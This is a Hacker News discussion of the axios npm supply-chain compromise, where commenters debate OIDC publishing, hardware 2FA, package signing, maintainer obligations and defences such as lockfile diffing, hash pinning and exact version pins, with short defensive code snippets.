        The problem would be new versions that fix security issues though, and because this is all open source as soon as you publish the fix everyone knows the vulnerability. You wouldn’t want everyone to stay on the insecure version with a basically public vulnerability for a week.

        • cromka 2 days ago ago

          Precisely my point.

      • Chyzwar 2 days ago ago

        This could be controlled by npm. Clients ask for available versions anyway. If a package is a security fix then it can be made available instantly. But the delay gives time for security scanners, and time to notify maintainers that a package was published.

        • mcintyre1994 2 days ago ago

          Then the malicious packages would always be published as a security fix.

    • mememememememo 2 days ago ago

      Just ban postinstall.

  • aeneas_ory 3 days ago ago

    Check if your machine was affected with this tool: https://github.com/aeneasr/was-i-axios-pwned

    • zwarag 3 days ago ago

      How do we know this is not the next tool in line to compromise a machine?

  • charcircuit 4 days ago ago

    Does OIDC flow block this same issue of being able to use a RAT to publish a malicious package?

    • hsbauauvhabzb 3 days ago ago

      No, once the computer is compromised nothing really helps assuming the attacker is patient enough.

    • fortuitous-frog 3 days ago ago

      No. axios (v1 at least; not v0) was set up to publish via OIDC, but there's no option on npmjs for package maintainers to restrict their package to *only* using OIDC. The maintainer says his machine was infected via RAT, so if he was using software-based 2FA, nothing could have prevented this.

      • dgellow 3 days ago ago

        Actually there is an option to restrict to only OIDC publishing. It is a bit hidden and relies on a different form for reasons I really cannot understand. Npm UX is just so bad.

        Point 4 from https://npmdigest.com/guides/npm-trusted-publishing#ux-probl...

        (I wrote that guide page for myself because I always get annoyed when dealing with npm OIDC)

    • mcintyre1994 3 days ago ago

      Nope, the most restrictive option available is to disallow tokens and require 2FA. I think that using exclusively hardware 2FA and not having the backup codes on the compromised machine probably would have prevented this attack though.

      • pepve 3 days ago ago

        Someone in the linked Github thread describes an attack where the attackers waited for the victim to use their Yubikey for an AWS login, giving the attackers access to AWS as well. I don't think hardware 2FA is safe against a RAT.

        • the8472 2 days ago ago

          Logins are session-based. You could tie publishing of a package to a signature from the key, then 1 tap = 1 package hash. But yeah, if the system is compromised and the attacker is doing interactive attacks they can wait for something that requires using the key and then trigger the publishing and win a race against the real prompt. To the user it might just appear like having to tap twice.

  • nurettin 3 days ago ago

    I never understood why all the CAS tutorials pushed axios. This was before vite, when build scripts were how you did react. After the compromise I reviewed some projects and converted them to pure JS fetch and vite.

    • pas 3 days ago ago

      what's CAS?

      • nurettin 2 days ago ago

        oops I meant create react app, no idea how I typed cas.

  • robshippr 3 days ago ago

    The interesting detail from the GitHub thread is shaanmajid's observation that every legitimate v1 release had OIDC provenance attestations and the malicious one didn't, but nobody checks. Even simpler, if you're diffing your lockfile between deploys, a brand new dependency appearing in a patch release is a pretty obvious red flag without needing any attestation infrastructure.
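    That lockfile diff takes only a few lines of scripting. The function names here are made up, and the sketch assumes a modern (lockfileVersion 2 or 3) package-lock.json with its flat "packages" map:

```python
import json

def installed_paths(lockfile: str) -> set[str]:
    """Collect node_modules paths from a v2/v3 package-lock.json 'packages' map."""
    with open(lockfile) as f:
        lock = json.load(f)
    # The empty-string key is the root project itself, so drop it.
    return {path for path in lock.get("packages", {}) if path}

def new_dependencies(old_lock: str, new_lock: str) -> list[str]:
    """Paths that appear in the new lockfile but not the old one -- a brand
    new dependency in a patch release is the red flag described above."""
    return sorted(installed_paths(new_lock) - installed_paths(old_lock))
```

    Running this between deploys (e.g. against the lockfile from the previous commit) would have surfaced the injected dependency immediately.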

  • momo_dev 3 days ago ago

    this is why i pin every dependency hash in my python projects. pip install --require-hashes with a locked requirements file catches exactly this, if the package hash changes unexpectedly the install fails. surprised this isn't the default in the npm ecosystem
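    For reference, the pip flow described above looks like this (the pinned version and digest are illustrative placeholders, not real values):

```
# requirements.txt, e.g. produced by `pip-compile --generate-hashes` (pip-tools)
requests==2.32.3 \
    --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
```

    `pip install --require-hashes -r requirements.txt` then fails closed if the digest of any downloaded artifact differs from the one recorded in the file.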

    • minitech 3 days ago ago

      Npm and the other JavaScript package managers do generate and check lockfiles with hashes by default. This was a new release, not a republishing of an old version (which isn’t possible on the npm registry anyway).

      • momo_dev 3 days ago ago

        i wasn't aware npm lockfiles check hashes by default now. my concern is more about the initial install before a lockfile exists, like in CI from a fresh clone without a committed lockfile. but you're right, once the lockfile is there the hash mismatch would be caught.

  • lrvick 3 days ago ago

    I ask this on every supply chain security fail: Can we please mandate signing packages? Or at least commits?

    NPM rejected PRs to support optional signing multiple times more than a decade ago now, and this choice has not aged well.

    Anyone that cannot take 5 minutes to set up commit signing with a $40 usb smartcard to prevent impersonation has absolutely no business writing widely depended upon FOSS software.

    Normalized negligence is still negligence.
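    For what it's worth, the commit-signing half of this boils down to a few git settings once a key has been generated and moved to the smartcard (the key ID below is a placeholder):

```
# ~/.gitconfig -- sign every commit and tag by default
[user]
    signingkey = 0xDEADBEEFDEADBEEF   # placeholder: your smartcard-resident key ID
[commit]
    gpgsign = true
[tag]
    gpgSign = true
```

    With the private key on the smartcard, each signature requires a physical touch/PIN, so a RAT on the host cannot silently sign on your behalf.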

    • 4ndrewl 3 days ago ago

      Is the onus really on people who write code here? It really should be on those who choose to use this unsigned code, surely?

      • lorenzohess 3 days ago ago

        Perhaps, but if it's gotten to the point where millions of people download the unsigned code, signing should probably become required. Even reproducible builds.

        • 4ndrewl 3 days ago ago

          Required by who though? If your business etc depends upon some code, it's up to you to ensure its quality, surely? You copy some code onto your machine then it's your codebase, right?

          • lrvick 3 days ago ago

            While I think anyone unwilling to sign their code is negligent, I also feel anyone unwilling to ensure credible review of code has been done before pushing it to production is equally negligent.

      • lrvick 3 days ago ago

        Anyone that maintains code for others to consume has a basic obligation to do the bare minimum to make sure their reputations are not hijacked by bad actors.

        Just sign commits and reviews. It is so easy to stop these attacks that not doing so is like a doctor that refuses to wash their hands between patients.

        If you are not going to wash your hands do not be a doctor.

        If you are not going to sign your code do not be a FOSS maintainer.

        • 4ndrewl 3 days ago ago

          No they don't! They have literally no obligations to you - and you've got the MIT/APL/GPL license to prove it. You're getting the benefit of their labour for free!

          Even if they did sign the code, what's stopping them slipping some crypto link in? And do they also need to check all the transitive dependencies in their code?

          • lrvick 3 days ago ago

            They have basic obligations as highly trusted FOSS software maintainers, a role they allowed themselves to be elected into, to make sure their hard earned goodwill and trust is not stolen by a bad actor. They also have a basic obligation to make sure they have accountability and review of all code before it gets to their users.

            Sitting back and expecting Microsoft to keep the community safe is going to continue to end badly. The community has an obligation to each other.

            Like, no one is making someone go bring a bunch of food to feed the homeless, but if you do, you have some basic social obligation to make sure it is sanitary and not poison.

            People who give things away for free widely absolutely have obligations, and if they do not like those, they should hand off the project to a quorum of responsible maintainers and demote themselves to just a contributor.

            • 4ndrewl 3 days ago ago

              They literally owe you nothing. They can walk away tomorrow, sell their github account, introduce breaking changes, add bugs, die, add crypto links, whatever.

              > if they do not like those, they should hand off the project to a quorum of responsible maintainers and demote themselves to just a contributor.

              The most responsible thing to do is to release it under an OSS license and let whoever, yes - including you, fork and maintain their own copy if it's that important.

        • hahn-kev 3 days ago ago

          If you're paid then sure. Otherwise... It depends.

          • lrvick 3 days ago ago

            Is a doctor doing volunteer work still obligated to wash their hands between patients?

            Is a food pantry giving away free food obligated to check expiration dates and make sure the food is properly sealed?

            Volunteer work absolutely has obligations, and I do not know why software volunteers are exempt from any responsibility unless they are being paid.

            If you do not want to do the volunteer work in a safe way, please hand off the job to a volunteer willing to do so.

    • eviks 3 days ago ago

      "Anyone that cannot spend $40+ to give every FOSS maintainer a smartcard and maybe even separate machines for releases and make the more secure workflow truly 5 minutes has absolutely no business widely depending upon FOSS"

      • lrvick 3 days ago ago

        A $50 used laptop from goodwill and a $40 yubikey will do the job.

        If maintainers really cannot afford that, they should flag it as a major big bold print supply chain risk on the readme: "We cannot afford 4 yubikeys for our maintainers and thus all code is signed with software keys in virtual machines as a best effort defense. Donate to our fund [here] to raise $500 for dedicated release hardware"

        Friends and I have gotten 100s of yubikeys and nitrokeys donated to FOSS maintainers, but FOSS maintainers have to be willing to say they would use them and signal that they need them.

        Honestly though, anyone that cannot afford $40 I expect is at high risk of being bribed or having to give up contributing to take on more work, so we should significantly fund any project signaling that much desperation.

    • patrakov a day ago ago

      > Anyone that cannot take 5 minutes to set up commit signing with a $40 usb smartcard to prevent impersonation has absolutely no business writing widely depended upon FOSS software.

      No. As a user of your package, I want assurance that the package you publish does what it says it does and does not contain malware. This is different from the package having been published by you. I want protection against you going rogue, not only from you being impersonated. 2FA on your side does not protect me against you going rogue. A comaintainer does.

      So the correct quote would be: Anyone that cannot find a comaintainer to review all the code and to prevent deliberate sabotage has absolutely no business writing widely depended upon FOSS software.

  • redoh 2 days ago ago

    [flagged]

    • panstromek 2 days ago ago

      Well, the hack didn't survive more than 2-3 hours if I'm not mistaken. I don't think that counts as "nobody acted on it."

      • panstromek 2 days ago ago

        Actually, from the OP, the timeline is:

        > March 31, 00:21 UTC: axios@1.14.1 published with plain-crypto-js@4.2.1 injected

        > March 31, around 01:00 UTC: axios@0.30.4 published with the same payload

        > March 31, around 01:00 UTC: first external detections

        > March 31, around 01:00 UTC: community members file issues reporting the compromise. The attacker deletes them using the compromised account.

        So it was found out almost immediately.

    • cyberax 2 days ago ago

      Another point: do NOT use the "~" or "^" versions for automatic updates. Just lock everything tight in your package files. Then have an alert on the lockfile changes.
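      Concretely, an exact pin is just the bare version with no range operator (versions illustrative):

```
{
  "dependencies": {
    "axios": "1.14.0"
  }
}
```

      Pairing this with `npm ci`, which installs strictly from the committed lockfile and fails on any mismatch, makes an unexpected lockfile change hard to miss.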

    • stingraycharles 2 days ago ago

      Please no AI posts on HN.